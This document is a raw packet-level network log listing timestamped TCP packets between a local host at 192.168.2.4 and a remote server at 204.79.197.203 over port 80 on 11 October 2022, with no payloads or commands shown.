Oct 11, 2022 15:04:22.575701952 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.575706959 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.575731993 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.575742960 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.575757980 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.575773001 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.575783014 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.575804949 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.575807095 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.575825930 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.575829983 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.575850010 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.575855970 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.575869083 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.575881958 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.575896025 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.575906992 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.575918913 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.575931072 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.575943947 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.575956106 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.575970888 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.575983047 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.575994968 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.576003075 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.576020002 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.576029062 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.576037884 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.576055050 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.576067924 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.576088905 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.576103926 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.576116085 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.576141119 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.576141119 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.576160908 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.576169014 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.576180935 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.576191902 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.576216936 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.576217890 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.576241970 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.576255083 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.576268911 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.576281071 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.576294899 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.576317072 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.576319933 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.576345921 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.576351881 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.576368093 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.576370001 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.576392889 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.576395988 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.576417923 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.576421976 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.576443911 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.576448917 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.576462984 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.576473951 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.576493025 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.576497078 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.576515913 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.576523066 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.576541901 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.576544046 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.576566935 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.576570034 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.576590061 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.576596975 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.576615095 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.576622963 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.576643944 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.576648951 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.576668978 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.576675892 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.576695919 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.576703072 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.576720953 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.576724052 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.576744080 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.576750994 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.576771021 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.576778889 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.576797962 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.576806068 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.576823950 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.576833010 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.576849937 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.576858044 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.576873064 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.576883078 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.576900005 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.576904058 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.576925993 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.576930046 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.576956034 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.576957941 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.576983929 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.576984882 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.577007055 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.577011108 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.577032089 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.577035904 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.577056885 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.577061892 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.577083111 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.577083111 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.577106953 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.577109098 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.577131987 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.577133894 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.577157974 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.577162027 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.577184916 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.577188015 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.577210903 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.577214003 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.577236891 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.577240944 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.577260971 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.577261925 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.577286005 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.577289104 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.577312946 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.577312946 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.577338934 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.577339888 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.577366114 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.577368021 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.577393055 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.577394009 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.577418089 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.577419043 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.577440023 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.577445030 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.577466011 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.577477932 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.577492952 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.577517986 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.577523947 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.577544928 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.577564001 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.577570915 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.577598095 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.577605963 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.577620029 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.577635050 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.577644110 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.577671051 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.577671051 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.577697039 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.577697992 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.577722073 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.577723980 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.577747107 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.577749014 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.577774048 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.577775002 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.577795982 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.577800035 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.577821970 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.577843904 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.577847004 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.577862978 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.577872038 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.577896118 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.577908039 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.577922106 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.577938080 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.577946901 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.577966928 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.577977896 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.577991962 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.578016996 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.578018904 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.578042984 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.578058958 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.578068972 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.578084946 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.578093052 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.578118086 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.578121901 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.578139067 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.578147888 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.578164101 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.578186989 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.578188896 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.578212976 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.578232050 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.578237057 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.578258991 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.578262091 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.578286886 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.578295946 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.578306913 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.578326941 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.578330040 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.578353882 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.578367949 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.578377962 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.578393936 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.578403950 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.578428984 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.578433990 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.578454018 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.578459024 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.578474045 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.578484058 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.578497887 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.578516006 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.578521967 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.578547001 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.578561068 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.578572989 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.578588963 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.578598976 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.578624964 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.578629017 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.578651905 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.578660965 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.578680992 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.578689098 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.578706026 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.578727961 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.578731060 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.578751087 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.578769922 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.578779936 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.578804016 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.578807116 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.578829050 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.578850985 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.578852892 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.578891993 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.578903913 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.578932047 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.578949928 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.578950882 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.578975916 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.578998089 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.578999996 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.579005957 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.579025030 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.579041004 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.579050064 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.579066992 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.579076052 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.579097033 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.579099894 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.579114914 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.579119921 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.579133034 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.579143047 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.579150915 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.579165936 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.579180002 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.579193115 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.579197884 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.579220057 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.579233885 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.579256058 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.588979959 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.589020967 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.589046955 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.589071989 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.589097023 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.589122057 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.589123964 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.589148998 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.589152098 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.589173079 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.589198112 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.589204073 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.589214087 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.589250088 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.589298010 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.595937014 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.595964909 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.595982075 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.596004009 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.596020937 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.596038103 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.596055031 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.596055984 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.596071959 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.596088886 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.596105099 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.596107006 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.596123934 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.596138000 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.596142054 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.596158981 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.596163988 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.596177101 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.596193075 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.596204042 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.596210003 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.596226931 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.596242905 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.596245050 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.596259117 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.596271038 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.596275091 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.596291065 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.596293926 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.596307039 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.596323013 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.596333027 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.596338034 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.596369982 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.596390963 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.597764969 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.597858906 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.604003906 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.604031086 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.604047060 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.604064941 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.604080915 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.604094982 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.604099035 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.604115963 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.604118109 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.604131937 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.604149103 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.604165077 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.604171991 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.604183912 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.604191065 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.604202986 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.604214907 CEST	49702	80	192.168.2.4	204.79.197.203
Oct 11, 2022 15:04:22.604218006 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:04:22.604234934 CEST	80	49702	204.79.197.203	192.168.2.4
